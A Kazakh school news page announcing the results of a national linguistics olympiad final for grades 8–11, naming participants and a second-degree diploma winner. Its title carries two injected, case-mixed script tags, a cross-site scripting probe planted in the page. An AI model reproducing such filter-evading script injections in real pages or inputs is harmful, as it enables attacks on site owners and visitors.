Лингвистика бойынша республикалық олимпиаданың қорытынды кезеңінің қорытындысы туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.11.2021

8-11 сынып оқушыларына арналған Лингвистика пәні бойынша республикалық олимпиаданың қорытынды туры 2021 жылдың 22 қарашасында онлайн режимде өтті.

Олимпиаданың мақсаты: қолданбалы Лингвистика пәні бойынша дарынды оқушыларды анықтау, дамыту және қолдау.

Олимпиадаға Лингвистика бойынша республикалық олимпиаданың облыстық кезеңінің екі жеңімпазы қатысты:

- Балсейіт Елдана, Көкшетау қаласы, Абай атындағы (қазақ тілінде оқытылатын) дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 10 сынып оқушысы;

- Изотова Татьяна, Степногорск қаласы, дарынды балаларға арналған №4 облыстық мамандандырылған «Болашақ» мектеп-интернатының 11 сынып оқушысы.

Лингвистика пәні бойынша республикалық олимпиаданың қорытынды кезеңінің қорытындысы бойынша Балсейіт Елдана ІІ дәрежелі диплом иегері атанды.

Олимпиададағы жеңісіңізбен құттықтаймыз! Алға жылжып, жаңа тұғырларды бағындыруды тілейміз!

Просмотров: 1767


Пікір қосу



Деректерді қолтаңбаға қосу